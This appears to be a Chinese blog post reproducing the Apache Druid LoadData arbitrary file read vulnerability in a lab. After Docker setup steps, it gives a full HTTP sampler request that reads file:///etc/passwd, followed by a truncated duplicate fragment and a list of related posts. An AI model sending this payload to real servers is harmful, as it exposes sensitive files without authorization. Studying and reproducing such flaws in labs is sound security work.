Apache Druid LoadData 任意文件读取漏洞
Apache Druid复现
描述
由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。
kali 环境配置
安装https协议、CA证书、dirmngr
apt-get update
apt-get install -y apt-transport-https ca-certificates
apt-get install dirmngr
添加GPG密钥并添加更新源
curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -
echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list
系统更新以及安装docker
apt-get update&&apt install docker-ce
启动docker服务器 和compose
service docker start || apt install docker-compose
访问网址:192.168.1.12:8888
url:file:///etc/passwd
burp抓包
修改burp请求包
POST /druid/indexer/v1/sampler?for=parser HTTP/1.1
Host: 192.168.1.12:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 427
Origin: http://192.168.1.12:8888
Connection: close
Referer: http://192.168.1.12:8888/unified-console.html
{“type”:“index”,“spec”:{“type”:“index”,“ioConfig”:{“type”:“index”,“inputSource”:{“type”:“http”,“uris”:[“file:///etc/passwd”]},“inputFormat”:{“type”:“regex”,“pattern”:“(.*)”,“columns”:[“column1”]}},“dataSchema”:{“dataSource”:“sample”,“timestampSpec”:{“column”:“!!!no_such_column!!!”,“missingValue”:“1970-01-01T00:00:00Z”},“dimensionsSpec”:{}},“tuningConfig”:{“type”:“index”}},“samplerConfig”:{“numRows”:500,“timeoutMs”:15000}}
ig":{“type”:“index”}},“samplerConfig”:{“numRows”:500,“timeoutMs”:15000}}
Apache Druid LoadData 任意文件读取漏洞相关推荐
- Apache Solr任意文件读取漏洞复现
Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...
- .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)
一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...
- Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...
- 【MetInfo任意文件读取】--任意文件读取漏洞
文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...
- 任意文件读取漏洞知识梳理
文章目录 1.概述 2.开发语言触发点 2.1 PHP 2.2 Python 2.3 Java 2.4 Ruby 2.5 Node 3.中间件/服务器相关触发点 3.1 Nginx错误配置 3.2 数 ...
- 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...
- Web漏洞-任意文件读取漏洞
任意文件读取漏洞 原理 任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过 ...
- php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复
修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...
- 安全研究 | Jenkins 任意文件读取漏洞分析
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...
最新文章
- Kattis - bela
- linux wc -l 对io,linux设备驱动归纳总结(五):2.操作硬件——IO内存
- 【模板小程序】求M~N范围内的质数个数
- Vim 的补全模式加速器,轻松玩转全部 15 种自动补全模式
- [Leedcode][JAVA][第136题][第137题][只出现一次的数字][位运算][HashSet][HashMap]
- android aptx固件,新增aptX蓝牙发射协议,M5固件首次升级!
- linux source 子shell,Linux------source
- Linux操作系统基础解析之(四)——Linux基本命令剖析(2)
- 学习 MFC 的好网站
- Linux下用户组、文件权限、更改目录下所有文件权限
- JS无刷新修改URL类似博客园翻页效果
- spark读写hive数据
- SAE J1939 协议源代码分析(二)-程序移植
- 刷机-升级到3.80M33的方法
- 微信小程序TabBar的使用
- 大数据挖掘与分析——用八爪鱼爬虫采集百度搜索内容
- png图片透明部分点击
- 买房子了~128.41平方哦`
- 【操作系统】CSAPP学习笔记
- 沈航计算机学院杨华,BCD码的加法.doc
热门文章
- 2016OSC源创会年终盛典-综合技术专场-George Neville-Neil
- 北大青鸟的班主任好当吗_【北大青鸟班主任就业前景怎么样|做北大青鸟班主任有前途吗】-看准网...
- [Alpha] Scrum Meeting 6 - TEAM LESS ERROR
- MA、WMA、EMA、EXPMA区别及公式详述
- 邂逅Flutter开发
- UINCODE字符串和安全字符串函数(好)
- Push failed Dst refspec V1.0.0 matches more than one.
- 暑假训练---三棱锥内切球公式及海伦公式
- java enum枚举型使用
- 函数有参无参真有很大区别吗?